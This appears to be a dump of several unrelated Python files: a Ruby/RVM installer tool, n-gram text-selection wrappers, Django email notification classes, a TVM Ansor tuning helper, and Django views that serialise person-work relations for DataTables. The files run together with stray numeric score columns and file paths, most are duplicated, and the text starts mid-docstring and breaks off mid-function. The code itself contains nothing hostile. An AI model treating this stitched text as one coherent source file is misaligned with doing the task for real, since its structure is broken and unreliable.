Note: RUBY_ENV and RAILS_ENV are set based on rubyEnv or .env.type
"""
__slots__ = ()
def getDeps(self):
return ['rvm']
def _installTool(self, env):
rvmTool('rvm').ensureGpgKeys(env)
if env['rubyFoundBinary']:
self._installBinaries(env)
return
self._buildDeps(env)
self._executil.callExternal([
env['rvmBin'], 'install', env['rubySourceVer'], '--autolibs=read-only'
])
self._executil.callExternal([
env['rvmBin'], 'cleanup', 'all'
])
def _installBinaries(self, env):
detect = self._detect
install = self._install
pathutil = self._pathutil
executil = self._executil
ver = env['rubyVer']
rvm_ruby_ver = 'system-{0}'.format(ver)
pkgver = ver
if detect.isDebian() or detect.isUbuntu():
code_name = self._detect.osCodeName()
if code_name in ['stretch']:
install.aptRepo('jessie-ssl10bp',
'deb http://deb.debian.org/debian jessie-backports main')
repo = env['rubyBrightboxRepo']
install.aptRepo(
'brightbox-ruby',
"deb {0} $codename$ main".format(repo),
self._GPG_BIRGHTBOX_REPO,
codename_map={
# Ubuntu
# Debian
'jessie': 'trusty',
'stretch': 'xenial',
'buster': 'bionic',
'testing': 'bionic',
'sid': 'bionic',
},
repo_base='{0}/dists'.format(repo)
)
if ver == '1.9':
pkgver = '1.9.[0-9]'
if detect.isDebian():
UBUNTU_MIRROR = 'https://debian.charite.de/ubuntu'
pkg = UBUNTU_MIRROR + '/pool/main/r/readline6/libreadline6_6.3-8ubuntu2_amd64.deb'
install.dpkg(env, 'libreadline6', pkg)
pkg = UBUNTU_MIRROR + '/pool/main/g/gdbm/libgdbm5_1.14.1-6_amd64.deb'
install.dpkg(env, 'libgdbm5', pkg)
install.deb([
'ruby{0}'.format(pkgver),
'ruby{0}-dev'.format(pkgver),
])
ruby_bins = self._ext.glob.glob('/usr/bin/ruby{0}*'.format(ver))
if len(ruby_bins) == 0:
self._errorExit('No Ruby found for version {0}'.format(ver))
ruby_bin = ruby_bins[0]
elif detect.isSCLSupported():
sclname = self._rubySCLName(ver)
install.yumSCL()
install.yum(sclname)
# required for LD_LIBRARY_PATH
env_to_set = executil.callExternal(
['scl', 'enable', sclname, 'env'], verbose=False)
pathutil.updateEnvFromOutput(env_to_set)
ruby_bin = executil.callExternal(
['scl', 'enable', sclname, 'which ruby'], verbose=False).strip()
elif detect.isMacOS():
formula = 'ruby@{0}'.format(ver)
install.brew(formula)
return
else:
self._systemDeps()
rvm_ruby_ver = 'system'
ruby_bin = pathutil.which('ruby')
executil.callExternal([
env['rvmBin'], 'remove', 'ext-{0}'.format(rvm_ruby_ver)
], suppress_fail=True)
executil.callExternal([
env['rvmBin'], 'mount', ruby_bin, '-n', rvm_ruby_ver
])
def _rubySCLName(self, ver):
pkgver = ver.replace('.', '')
if pkgver == '19':
sclname = 'ruby193'
elif pkgver == '20':
sclname = 'ruby200'
else:
sclname = 'rh-ruby' + pkgver
return sclname
def _fixRvmLinks(self, env, name, ver):
ospath = self._ospath
os = self._os
glob = self._ext.glob
bin_dir = ospath.join(env['rvmDir'], 'rubies', name, 'bin')
for f in ['erb', 'gem', 'irb', 'rake', 'rdoc', 'ri', 'ruby', 'testrb']:
f = ospath.join(bin_dir, f)
res = glob.glob('{0}{1}*'.format(f, ver))
if res:
res = ospath.basename(res[0])
if os.readlink(f) == res:
continue
try:
os.unlink(f)
except Exception as e:
self._warn(str(e))
os.symlink(res, f)
def _updateTool(self, env):
if not env['rubyFoundBinary']:
self._installTool(env)
def uninstallTool(self, env):
ruby_ver = env['rubyVer']
if not env['rubyFoundBinary']:
self._executil.callExternal([
env['rvmBin'], 'uninstall', env['rubyVer']
])
self._have_tool = False
def envNames(self):
return ['rubyVer', 'rubyBin', 'rubyBinOnly', 'rubyForceBuild', 'rubySourceVer', 'rubyEnv']
def initEnv(self, env):
environ = self._environ
ospath = self._ospath
detect = self._detect
path = self._pathutil
# ---
ruby_env = env.get('rubyEnv', '')
if ruby_env:
pass
elif env['type'] == 'dev':
ruby_env = 'development'
else:
ruby_env = 'production'
environ['RUBY_ENV'] = ruby_env
environ['RAILS_ENV'] = ruby_env
# ---
if 'GEM_HOME' in environ:
path.delEnvPath('PATH', environ['GEM_HOME'])
path.delEnvPath('GEM_PATH', environ['GEM_HOME'])
del environ['GEM_HOME']
# ---
rubyForceBuild = env.setdefault('rubyForceBuild', False)
rubyBinOnly = env.setdefault('rubyBinOnly', not rubyForceBuild)
if rubyBinOnly and rubyForceBuild:
self._warn('"rubyBinOnly" and "rubyForceBuild" do not make sense'
' when set together!')
# ---
if detect.isDebian() or detect.isUbuntu():
bb_repo = 'http://ppa.launchpad.net/brightbox/ruby-ng/ubuntu'
ruby_binaries = ['1.9', '2.0', '2.1',
'2.2', '2.3', '2.4', '2.5', '2.6']
code_name = self._detect.osCodeName()
if code_name in []:
# 1.9 build is broken on LaunchPad
bb_repo = 'http://ppa.launchpad.net/brightbox/ruby-ng-experimental/ubuntu'
env.setdefault('rubyBrightboxRepo', bb_repo)
elif detect.isSCLSupported():
if detect.isCentOS():
ruby_binaries = ['1.9', '2.0', '2.2', '2.3', '2.4', '2.5']
else:
ruby_binaries = ['1.9', '2.0', '2.2', '2.3', '2.4', '2.5']
elif detect.isMacOS():
ruby_binaries = ['1.8', '1.9', '2.0',
'2.2', '2.3', '2.4', '2.5', '2.6']
else:
ruby_binaries = None
# ---
if ruby_binaries and not rubyForceBuild:
ruby_ver = env.setdefault('rubyVer', ruby_binaries[-1])
foundBinary = ruby_ver in ruby_binaries
rvm_ruby_ver = ruby_ver
if foundBinary:
rvm_ruby_ver = 'ext-system-{0}'.format(ruby_ver)
# required for LD_LIBRARY_PATH
if detect.isSCLSupported():
sclname = self._rubySCLName(ruby_ver)
try:
env_to_set = self._executil.callExternal(
['scl', 'enable', sclname, 'env'], verbose=False)
self._pathutil.updateEnvFromOutput(env_to_set)
except self._ext.subprocess.CalledProcessError:
pass
except OSError:
pass
elif detect.isMacOS():
env['rubyFoundBinary'] = True
formula = 'ruby@{0}'.format(ruby_ver)
brew_prefix = env['brewDir']
ruby_bin_dir = ospath.join(
brew_prefix, 'opt', formula, 'bin')
if ospath.exists(ruby_bin_dir):
self._pathutil.addBinPath(ruby_bin_dir, True)
super(rubyTool, self).initEnv(env)
self._environ['rubyVer'] = ruby_ver
return
elif detect.isDebian() or detect.isUbuntu():
self._fixRvmLinks(env, rvm_ruby_ver, ruby_ver)
else:
ruby_ver = env.setdefault('rubyVer', self.SYSTEM_VER)
foundBinary = ruby_ver == self.SYSTEM_VER
rvm_ruby_ver = foundBinary and ruby_ver or 'ext-system'
# ---
rvm_dir = env['rvmDir']
env['rubyFoundBinary'] = foundBinary
if rubyForceBuild or not foundBinary:
rvm_ruby_ver = env.setdefault('rubySourceVer', ruby_ver or 'ruby')
try:
env_to_set = self._callBash(env,
'source {0} && \
rvm use {1} >/dev/null && \
env | grep "rvm"'.format(env['rvmInit'], rvm_ruby_ver),
verbose=False
)
except:
return
if env_to_set:
self._pathutil.updateEnvFromOutput(env_to_set)
super(rubyTool, self).initEnv(env)
self._environ['rubyVer'] = ruby_ver
def _buildDeps(self, env):
self._builddep.require(env, 'ssl')
# APT
# ---
self._install.deb([
'build-essential',
'gawk',
'make',
'libc6-dev',
'zlib1g-dev',
'libyaml-dev',
'libsqlite3-dev',
'sqlite3',
'autoconf',
'libgmp-dev',
'libgdbm-dev',
'libncurses5-dev',
'automake',
'libtool',
'bison',
'pkg-config',
'libffi-dev',
'libgmp-dev',
'libreadline-dev',
])
# Extra repo before the rest
# ---
self._install.yumEPEL()
self._install.rpm([
'binutils',
'patch',
'libyaml-devel',
'autoconf',
'gcc',
'gcc-c++',
'glibc-devel',
'readline-devel',
'zlib-devel',
'libffi-devel',
'automake',
'libtool',
'bison',
'sqlite-devel',
'make',
'm4',
'gdbm-devel',
'sqlite3-devel',
])
# ---
self._install.emergeDepsOnly(['dev-lang/ruby'])
self._install.pacman(['ruby'])
self._install.apk('build-base')
def _systemDeps(self):
self._install.debrpm(['ruby'])
self._install.emerge(['dev-lang/ruby'])
self._install.pacman(['ruby'])
self._install.apk(['ruby',
'ruby-bigdecimal',
'ruby-libs',
'ruby-io-console',
'ruby-irb',
'ruby-json',
'ruby-minitest',
'ruby-net-telnet',
'ruby-power_assert',
'ruby-xmlrpc'
])
_GPG_BIRGHTBOX_REPO = '''
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: SKS 1.1.6
Comment: Hostname: keyserver.ubuntu.com
<KEY>
-----END PGP PUBLIC KEY BLOCK-----
'''
def tuneDefaults(self, env):
return {
'minMemory': '8M',
'socketType': 'none',
'scalable': False,
'reloadable': False,
'multiCore': True,
} | 0.458834 | 0.123339 |
from collections import OrderedDict
from math import inf
from typing import Dict, List, Optional
from typing import OrderedDict as OrderedDictType
from typing import Set
from ordered_set import OrderedSet
from text_selection.greedy_kld_applied import (
greedy_kld_uniform_count, greedy_kld_uniform_default,
greedy_kld_uniform_iterations, greedy_kld_uniform_parts,
greedy_kld_uniform_seconds, greedy_kld_uniform_seconds_with_preselection)
from text_selection.utils import (DurationBoundary, filter_data_durations,
get_filtered_ngrams)
def greedy_kld_uniform_ngrams_parts(data: OrderedDictType[int, List[str]], n_gram: int, ignore_symbols: Optional[Set[str]], parts_count: int, take_per_part: int, n_jobs: int, maxtasksperchild: Optional[int], chunksize: Optional[int]) -> OrderedSet[int]:
data_ngrams = get_filtered_ngrams(data, n_gram, ignore_symbols)
lengths = OrderedDict([(k, len(v)) for k, v in data.items()])
return greedy_kld_uniform_parts(
data=data_ngrams,
take_per_part=take_per_part,
parts_count=parts_count,
lengths=lengths,
n_jobs=n_jobs,
maxtasksperchild=maxtasksperchild,
chunksize=chunksize,
)
def greedy_kld_uniform_ngrams_default(data: OrderedDictType[int, List[str]], n_gram: int, ignore_symbols: Optional[Set[str]], n_jobs: int, maxtasksperchild: Optional[int], chunksize: Optional[int]) -> OrderedSet[int]:
data_ngrams = get_filtered_ngrams(data, n_gram, ignore_symbols)
return greedy_kld_uniform_default(
data=data_ngrams,
n_jobs=n_jobs,
maxtasksperchild=maxtasksperchild,
chunksize=chunksize,
)
def greedy_kld_uniform_ngrams_iterations(data: OrderedDictType[int, List[str]], n_gram: int, ignore_symbols: Optional[Set[str]], iterations: int, n_jobs: int, maxtasksperchild: Optional[int], chunksize: Optional[int]) -> OrderedSet[int]:
data_ngrams = get_filtered_ngrams(data, n_gram, ignore_symbols)
return greedy_kld_uniform_iterations(
data=data_ngrams,
iterations=iterations,
n_jobs=n_jobs,
maxtasksperchild=maxtasksperchild,
chunksize=chunksize,
)
def greedy_kld_uniform_ngrams_seconds(data: OrderedDictType[int, List[str]], n_gram: int, ignore_symbols: Optional[Set[str]], durations_s: Dict[int, float], seconds: float, n_jobs: int, maxtasksperchild: Optional[int], chunksize: Optional[int]) -> OrderedSet[int]:
data_ngrams = get_filtered_ngrams(data, n_gram, ignore_symbols)
return greedy_kld_uniform_seconds(
data=data_ngrams,
durations_s=durations_s,
seconds=seconds,
n_jobs=n_jobs,
maxtasksperchild=maxtasksperchild,
chunksize=chunksize,
)
def greedy_kld_uniform_ngrams_seconds_with_preselection(data: OrderedDictType[int, List[str]], n_gram: int, ignore_symbols: Optional[Set[str]], durations_s: Dict[int, float], seconds: float, preselection: OrderedDictType[int, List[str]], duration_boundary: DurationBoundary, n_jobs: int, maxtasksperchild: Optional[int], chunksize: Optional[int]) -> OrderedSet[int]:
data_ngrams = get_filtered_ngrams(data, n_gram, ignore_symbols)
data_ngrams = filter_data_durations(data_ngrams, durations_s, duration_boundary)
preselection_ngrams = get_filtered_ngrams(preselection, n_gram, ignore_symbols)
return greedy_kld_uniform_seconds_with_preselection(
data=data_ngrams,
durations_s=durations_s,
seconds=seconds,
preselection=preselection_ngrams,
n_jobs=n_jobs,
maxtasksperchild=maxtasksperchild,
chunksize=chunksize,
)
def greedy_kld_uniform_ngrams_count(data: OrderedDictType[int, List[str]], n_gram: int, ignore_symbols: Optional[Set[str]], chars: Dict[int, int], total_count: int, n_jobs: int, maxtasksperchild: Optional[int], chunksize: Optional[int]) -> OrderedSet[int]:
data_ngrams = get_filtered_ngrams(data, n_gram, ignore_symbols)
return greedy_kld_uniform_count(
data=data_ngrams,
chars=chars,
total_count=total_count,
n_jobs=n_jobs,
maxtasksperchild=maxtasksperchild,
chunksize=chunksize,
) | src/text_selection/greedy_kld_export.py | from collections import OrderedDict
from math import inf
from typing import Dict, List, Optional
from typing import OrderedDict as OrderedDictType
from typing import Set
from ordered_set import OrderedSet
from text_selection.greedy_kld_applied import (
greedy_kld_uniform_count, greedy_kld_uniform_default,
greedy_kld_uniform_iterations, greedy_kld_uniform_parts,
greedy_kld_uniform_seconds, greedy_kld_uniform_seconds_with_preselection)
from text_selection.utils import (DurationBoundary, filter_data_durations,
get_filtered_ngrams)
def greedy_kld_uniform_ngrams_parts(data: OrderedDictType[int, List[str]], n_gram: int, ignore_symbols: Optional[Set[str]], parts_count: int, take_per_part: int, n_jobs: int, maxtasksperchild: Optional[int], chunksize: Optional[int]) -> OrderedSet[int]:
data_ngrams = get_filtered_ngrams(data, n_gram, ignore_symbols)
lengths = OrderedDict([(k, len(v)) for k, v in data.items()])
return greedy_kld_uniform_parts(
data=data_ngrams,
take_per_part=take_per_part,
parts_count=parts_count,
lengths=lengths,
n_jobs=n_jobs,
maxtasksperchild=maxtasksperchild,
chunksize=chunksize,
)
def greedy_kld_uniform_ngrams_default(data: OrderedDictType[int, List[str]], n_gram: int, ignore_symbols: Optional[Set[str]], n_jobs: int, maxtasksperchild: Optional[int], chunksize: Optional[int]) -> OrderedSet[int]:
data_ngrams = get_filtered_ngrams(data, n_gram, ignore_symbols)
return greedy_kld_uniform_default(
data=data_ngrams,
n_jobs=n_jobs,
maxtasksperchild=maxtasksperchild,
chunksize=chunksize,
)
def greedy_kld_uniform_ngrams_iterations(data: OrderedDictType[int, List[str]], n_gram: int, ignore_symbols: Optional[Set[str]], iterations: int, n_jobs: int, maxtasksperchild: Optional[int], chunksize: Optional[int]) -> OrderedSet[int]:
data_ngrams = get_filtered_ngrams(data, n_gram, ignore_symbols)
return greedy_kld_uniform_iterations(
data=data_ngrams,
iterations=iterations,
n_jobs=n_jobs,
maxtasksperchild=maxtasksperchild,
chunksize=chunksize,
)
def greedy_kld_uniform_ngrams_seconds(data: OrderedDictType[int, List[str]], n_gram: int, ignore_symbols: Optional[Set[str]], durations_s: Dict[int, float], seconds: float, n_jobs: int, maxtasksperchild: Optional[int], chunksize: Optional[int]) -> OrderedSet[int]:
data_ngrams = get_filtered_ngrams(data, n_gram, ignore_symbols)
return greedy_kld_uniform_seconds(
data=data_ngrams,
durations_s=durations_s,
seconds=seconds,
n_jobs=n_jobs,
maxtasksperchild=maxtasksperchild,
chunksize=chunksize,
)
def greedy_kld_uniform_ngrams_seconds_with_preselection(data: OrderedDictType[int, List[str]], n_gram: int, ignore_symbols: Optional[Set[str]], durations_s: Dict[int, float], seconds: float, preselection: OrderedDictType[int, List[str]], duration_boundary: DurationBoundary, n_jobs: int, maxtasksperchild: Optional[int], chunksize: Optional[int]) -> OrderedSet[int]:
data_ngrams = get_filtered_ngrams(data, n_gram, ignore_symbols)
data_ngrams = filter_data_durations(data_ngrams, durations_s, duration_boundary)
preselection_ngrams = get_filtered_ngrams(preselection, n_gram, ignore_symbols)
return greedy_kld_uniform_seconds_with_preselection(
data=data_ngrams,
durations_s=durations_s,
seconds=seconds,
preselection=preselection_ngrams,
n_jobs=n_jobs,
maxtasksperchild=maxtasksperchild,
chunksize=chunksize,
)
def greedy_kld_uniform_ngrams_count(data: OrderedDictType[int, List[str]], n_gram: int, ignore_symbols: Optional[Set[str]], chars: Dict[int, int], total_count: int, n_jobs: int, maxtasksperchild: Optional[int], chunksize: Optional[int]) -> OrderedSet[int]:
data_ngrams = get_filtered_ngrams(data, n_gram, ignore_symbols)
return greedy_kld_uniform_count(
data=data_ngrams,
chars=chars,
total_count=total_count,
n_jobs=n_jobs,
maxtasksperchild=maxtasksperchild,
chunksize=chunksize,
) | 0.899022 | 0.313302 |
import abc
from collections import namedtuple
from django.conf import settings
from django.template.loader import render_to_string
from django.utils.encoding import force_bytes
from django.utils.http import urlsafe_base64_encode
import core.tasks
from notifications import constants, helpers, models, tokens
Recipient = namedtuple('Recipient', ['email', 'name'])
class NotificationBase(abc.ABC):
category = abc.abstractproperty()
from_email = abc.abstractproperty()
html_template = abc.abstractproperty()
recipient = abc.abstractproperty()
subject = abc.abstractproperty()
text_template = abc.abstractproperty()
unsubscribe_url = abc.abstractproperty()
zendesk_url = settings.ZENDESK_URL
def get_context_data(self, **kwargs):
return {
'full_name': self.recipient.name,
'zendesk_url': self.zendesk_url,
'unsubscribe_url': self.unsubscribe_url,
**kwargs,
}
def get_bodies(self):
context = self.get_context_data()
text_body = render_to_string(self.text_template, context)
html_body = render_to_string(self.html_template, context)
return text_body, html_body
def send(self):
raise NotImplementedError
class SupplierNotificationBase(NotificationBase):
from_email = settings.FAB_FROM_EMAIL
def __init__(self, company_user):
self.company_user = company_user
@property
def recipient(self):
return Recipient(name=self.company_user.name, email=self.company_user.company_email)
def send(self):
text_body, html_body = self.get_bodies()
models.SupplierEmailNotification.objects.create(company_user=self.company_user, category=self.category)
core.tasks.send_email.delay(
subject=self.subject,
text_body=text_body,
html_body=html_body,
recipient_email=self.recipient.email,
from_email=self.from_email,
)
class AnonymousSubscriberNotificationBase(NotificationBase):
from_email = settings.FAS_FROM_EMAIL
def __init__(self, subscriber):
self.subscriber = subscriber
self.notification = models.AnonymousEmailNotification.objects.create(
email=self.recipient.email, category=self.category
)
@property
def recipient(self):
return Recipient(name=self.subscriber['name'], email=self.subscriber['email'])
def send(self):
text_body, html_body = self.get_bodies()
core.tasks.send_email.delay(
subject=self.subject,
text_body=text_body,
html_body=html_body,
recipient_email=self.recipient.email,
from_email=self.from_email,
)
class VerificationWaitingNotification(SupplierNotificationBase):
html_template = 'verification_code_not_given_email.html'
category = constants.VERIFICATION_CODE_NOT_GIVEN
subject = settings.VERIFICATION_CODE_NOT_GIVEN_SUBJECT
text_template = 'verification_code_not_given_email.txt'
unsubscribe_url = settings.FAB_NOTIFICATIONS_UNSUBSCRIBE_URL
def get_context_data(self):
return super().get_context_data(verification_url=settings.VERIFICATION_CODE_URL)
class VerificationStillWaitingNotification(SupplierNotificationBase):
html_template = 'verification_code_not_given_2nd_email.html'
category = constants.VERIFICATION_CODE_2ND_EMAIL
subject = settings.VERIFICATION_CODE_NOT_GIVEN_SUBJECT_2ND_EMAIL
text_template = 'verification_code_not_given_2nd_email.txt'
unsubscribe_url = settings.FAB_NOTIFICATIONS_UNSUBSCRIBE_URL
def get_context_data(self):
return super().get_context_data(
verification_url=settings.VERIFICATION_CODE_URL,
)
class NewCompaniesInSectorNotification(AnonymousSubscriberNotificationBase):
html_template = 'new_companies_in_sector_email.html'
category = constants.NEW_COMPANIES_IN_SECTOR
subject = settings.NEW_COMPANIES_IN_SECTOR_SUBJECT
text_template = 'new_companies_in_sector_email.txt'
def __init__(self, subscriber, companies):
self.companies = companies
super().__init__(subscriber=subscriber)
@property
def unsubscribe_url(self):
uidb64 = urlsafe_base64_encode(force_bytes(self.notification.pk))
token = tokens.anonymous_unsubscribe_token.make_token(self.notification)
return helpers.get_anonymous_unsubscribe_url(uidb64, token)
def get_context_data(self):
return super().get_context_data(
company_list_url=settings.FAS_COMPANY_LIST_URL,
utm_params=settings.NEW_COMPANIES_IN_SECTOR_UTM,
companies=list(self.companies)[:5], # show only 5: ED-1228
)
class SupplierUbsubscribed(SupplierNotificationBase):
html_template = 'unsubscribed-supplier.html'
category = constants.UNSUBSCRIBED
subject = settings.UNSUBSCRIBED_SUBJECT
text_template = 'unsubscribed-supplier.txt'
unsubscribe_url = None
class AnonymousSubscriberUbsubscribed(AnonymousSubscriberNotificationBase):
html_template = 'unsubscribed-anonymous-subscriber.html'
category = constants.UNSUBSCRIBED
subject = settings.UNSUBSCRIBED_SUBJECT
text_template = 'unsubscribed-anonymous-subscriber.txt'
unsubscribe_url = None | notifications/email.py | import abc
from collections import namedtuple
from django.conf import settings
from django.template.loader import render_to_string
from django.utils.encoding import force_bytes
from django.utils.http import urlsafe_base64_encode
import core.tasks
from notifications import constants, helpers, models, tokens
Recipient = namedtuple('Recipient', ['email', 'name'])
class NotificationBase(abc.ABC):
category = abc.abstractproperty()
from_email = abc.abstractproperty()
html_template = abc.abstractproperty()
recipient = abc.abstractproperty()
subject = abc.abstractproperty()
text_template = abc.abstractproperty()
unsubscribe_url = abc.abstractproperty()
zendesk_url = settings.ZENDESK_URL
def get_context_data(self, **kwargs):
return {
'full_name': self.recipient.name,
'zendesk_url': self.zendesk_url,
'unsubscribe_url': self.unsubscribe_url,
**kwargs,
}
def get_bodies(self):
context = self.get_context_data()
text_body = render_to_string(self.text_template, context)
html_body = render_to_string(self.html_template, context)
return text_body, html_body
def send(self):
raise NotImplementedError
class SupplierNotificationBase(NotificationBase):
from_email = settings.FAB_FROM_EMAIL
def __init__(self, company_user):
self.company_user = company_user
@property
def recipient(self):
return Recipient(name=self.company_user.name, email=self.company_user.company_email)
def send(self):
text_body, html_body = self.get_bodies()
models.SupplierEmailNotification.objects.create(company_user=self.company_user, category=self.category)
core.tasks.send_email.delay(
subject=self.subject,
text_body=text_body,
html_body=html_body,
recipient_email=self.recipient.email,
from_email=self.from_email,
)
class AnonymousSubscriberNotificationBase(NotificationBase):
from_email = settings.FAS_FROM_EMAIL
def __init__(self, subscriber):
self.subscriber = subscriber
self.notification = models.AnonymousEmailNotification.objects.create(
email=self.recipient.email, category=self.category
)
@property
def recipient(self):
return Recipient(name=self.subscriber['name'], email=self.subscriber['email'])
def send(self):
text_body, html_body = self.get_bodies()
core.tasks.send_email.delay(
subject=self.subject,
text_body=text_body,
html_body=html_body,
recipient_email=self.recipient.email,
from_email=self.from_email,
)
class VerificationWaitingNotification(SupplierNotificationBase):
html_template = 'verification_code_not_given_email.html'
category = constants.VERIFICATION_CODE_NOT_GIVEN
subject = settings.VERIFICATION_CODE_NOT_GIVEN_SUBJECT
text_template = 'verification_code_not_given_email.txt'
unsubscribe_url = settings.FAB_NOTIFICATIONS_UNSUBSCRIBE_URL
def get_context_data(self):
return super().get_context_data(verification_url=settings.VERIFICATION_CODE_URL)
class VerificationStillWaitingNotification(SupplierNotificationBase):
html_template = 'verification_code_not_given_2nd_email.html'
category = constants.VERIFICATION_CODE_2ND_EMAIL
subject = settings.VERIFICATION_CODE_NOT_GIVEN_SUBJECT_2ND_EMAIL
text_template = 'verification_code_not_given_2nd_email.txt'
unsubscribe_url = settings.FAB_NOTIFICATIONS_UNSUBSCRIBE_URL
def get_context_data(self):
return super().get_context_data(
verification_url=settings.VERIFICATION_CODE_URL,
)
class NewCompaniesInSectorNotification(AnonymousSubscriberNotificationBase):
html_template = 'new_companies_in_sector_email.html'
category = constants.NEW_COMPANIES_IN_SECTOR
subject = settings.NEW_COMPANIES_IN_SECTOR_SUBJECT
text_template = 'new_companies_in_sector_email.txt'
def __init__(self, subscriber, companies):
self.companies = companies
super().__init__(subscriber=subscriber)
@property
def unsubscribe_url(self):
uidb64 = urlsafe_base64_encode(force_bytes(self.notification.pk))
token = tokens.anonymous_unsubscribe_token.make_token(self.notification)
return helpers.get_anonymous_unsubscribe_url(uidb64, token)
def get_context_data(self):
return super().get_context_data(
company_list_url=settings.FAS_COMPANY_LIST_URL,
utm_params=settings.NEW_COMPANIES_IN_SECTOR_UTM,
companies=list(self.companies)[:5], # show only 5: ED-1228
)
class SupplierUbsubscribed(SupplierNotificationBase):
html_template = 'unsubscribed-supplier.html'
category = constants.UNSUBSCRIBED
subject = settings.UNSUBSCRIBED_SUBJECT
text_template = 'unsubscribed-supplier.txt'
unsubscribe_url = None
class AnonymousSubscriberUbsubscribed(AnonymousSubscriberNotificationBase):
html_template = 'unsubscribed-anonymous-subscriber.html'
category = constants.UNSUBSCRIBED
subject = settings.UNSUBSCRIBED_SUBJECT
text_template = 'unsubscribed-anonymous-subscriber.txt'
unsubscribe_url = None | 0.565899 | 0.077343 |
import tvm
from functools import reduce
from tvm import auto_scheduler
from tvm.auto_scheduler.cost_model import RandomModel, XGBModel
from tvm.auto_scheduler.search_policy import SketchPolicy
def establish_task_ansor(
schedule_gen, schedule_app,
measure_opt, task_name):
target_dag = schedule_app.target_dag
inputs = target_dag.get_inputs()
args = inputs + list(target_dag.tensors)
def task_func():
return args
registered_func = auto_scheduler.register_workload(
task_name, f=task_func)
target = tvm.target.Target(measure_opt.target)
task = auto_scheduler.create_task(
task_name, (), target, hw_abs_dag=schedule_gen.hw_abs_dag_stage)
return task
def find_optimized_params_ansor(task, measure_opt, trials, model="random"):
task_name = task.workload_key
log_name = task_name + ".log"
measure_ctx = auto_scheduler.LocalRPCMeasureContext(
priority=measure_opt.priority,
timeout=measure_opt.timeout,
number=measure_opt.number,
repeat=measure_opt.repeat,
min_repeat_ms=measure_opt.min_repeat_ms,
cooldown_interval=measure_opt.cooldown_interval,
enable_cpu_cache_flush=measure_opt.enable_cpu_cache_flush)
tune_option = auto_scheduler.TuningOptions(
num_measure_trials=trials,
runner=measure_ctx.runner,
measure_callbacks=[auto_scheduler.RecordToFile(log_name)],
)
if model == "random":
cost_model = RandomModel()
elif model == "xgb":
cost_model = XGBModel()
else:
raise RuntimeError("Unsupported model: %s" % model)
search_policy = SketchPolicy(task, cost_model)
sch, args = auto_scheduler.auto_schedule(
task, search_policy=search_policy, tuning_options=tune_option)
return log_name
def get_schedule_ansor(task, log_name):
inp, res = auto_scheduler.load_best(log_name, task.workload_key)
sch, args = task.compute_dag.apply_steps_from_state(inp.state)
return sch, args | python/tvm/auto_tensorize/search/ansor_integrate.py | import tvm
from functools import reduce
from tvm import auto_scheduler
from tvm.auto_scheduler.cost_model import RandomModel, XGBModel
from tvm.auto_scheduler.search_policy import SketchPolicy
def establish_task_ansor(
schedule_gen, schedule_app,
measure_opt, task_name):
target_dag = schedule_app.target_dag
inputs = target_dag.get_inputs()
args = inputs + list(target_dag.tensors)
def task_func():
return args
registered_func = auto_scheduler.register_workload(
task_name, f=task_func)
target = tvm.target.Target(measure_opt.target)
task = auto_scheduler.create_task(
task_name, (), target, hw_abs_dag=schedule_gen.hw_abs_dag_stage)
return task
def find_optimized_params_ansor(task, measure_opt, trials, model="random"):
task_name = task.workload_key
log_name = task_name + ".log"
measure_ctx = auto_scheduler.LocalRPCMeasureContext(
priority=measure_opt.priority,
timeout=measure_opt.timeout,
number=measure_opt.number,
repeat=measure_opt.repeat,
min_repeat_ms=measure_opt.min_repeat_ms,
cooldown_interval=measure_opt.cooldown_interval,
enable_cpu_cache_flush=measure_opt.enable_cpu_cache_flush)
tune_option = auto_scheduler.TuningOptions(
num_measure_trials=trials,
runner=measure_ctx.runner,
measure_callbacks=[auto_scheduler.RecordToFile(log_name)],
)
if model == "random":
cost_model = RandomModel()
elif model == "xgb":
cost_model = XGBModel()
else:
raise RuntimeError("Unsupported model: %s" % model)
search_policy = SketchPolicy(task, cost_model)
sch, args = auto_scheduler.auto_schedule(
task, search_policy=search_policy, tuning_options=tune_option)
return log_name
def get_schedule_ansor(task, log_name):
inp, res = auto_scheduler.load_best(log_name, task.workload_key)
sch, args = task.compute_dag.apply_steps_from_state(inp.state)
return sch, args | 0.442637 | 0.153676 |
from django.http import JsonResponse
from collections import Counter
import pandas as pd
import json
from datetime import date, timedelta
from django.contrib.auth.decorators import login_required
from django.utils.decorators import method_decorator
from django.urls import reverse
from django.db.models import Avg, Sum, Count
from django.shortcuts import render
from django.views.generic import TemplateView
from relations.models import *
from entities.models import *
def make_href(row, entity='work', id='id', label=None):
url = reverse(
'entities:generic_entities_detail_view',
kwargs={'pk': row[id], 'entity': entity}
)
if label:
element = """<a href="{}" target='_blank'>{}</a>""".format(url, row[label])
else:
element = """<a href="{}" target='_blank'>{}</a>""".format(url, 'link2object')
return element
def calculate_duration(row):
if row['end_date'] and row['start_date']:
time = pd.to_timedelta(
(row['end_date']-row['start_date']) + timedelta(days=1)
).__str__()
else:
time = pd.to_timedelta("0 days").__str__()
return time
def get_datatables_data_orig(request):
"""returns basically the original excel sheet data"""
pd.set_option('display.max_colwidth', -1)
works = Work.objects.exclude(kind__name__startswith='Verfach')
rows = list(works.values('id', 'excel_row'))
lines = [[{'id': x['id']}, json.loads(x['excel_row'])] for x in rows]
lines = [dict(x[1], **x[0]) for x in lines]
df = pd.DataFrame(lines)
df['Signatur'] = df.apply(
lambda row: make_href(
row, entity='work',
id='id',
label='Signatur'
), axis=1
)
payload = {}
payload['data'] = df.values.tolist()
payload['columns'] = list(df)
return JsonResponse(payload)
def get_datatables_data(request):
    """Serialize PersonWork relations into a DataTables payload.

    Adds hyperlinked work/person names, per-work and per-person relation
    counts, grouping ratios, and an inclusive duration column.
    """
    # None (not -1) disables column-width truncation: -1 was deprecated in
    # pandas 1.0 and raises in pandas >= 2.0.
    pd.set_option('display.max_colwidth', None)
    # PersonWorkRelation
    queryset = list(
        PersonWork.objects.values(
            'id',
            'relation_type__name',
            'related_work__name',
            'related_work',
            'related_person__name',
            'related_person',
            'start_date',
            'end_date',
        )
    )
    df = pd.DataFrame(queryset)
    df['related_work__name'] = df.apply(
        lambda row: make_href(
            row, entity='work',
            id='related_work',
            label='related_work__name'
        ), axis=1
    )
    df['related_person__name'] = df.apply(
        lambda row: make_href(
            row, entity='person',
            id='related_person',
            label='related_person__name'
        ), axis=1
    )
    # How many relation rows each work has ...
    df['involved_pers'] = df.groupby('related_work__name')['related_work__name']\
        .transform('count')
    df['grouped_by_pers'] = df.groupby('involved_pers')['involved_pers'].transform('count')
    df['grouped_by_pers'] = (df['grouped_by_pers'] / df['involved_pers'])
    # ... and how many each person has.
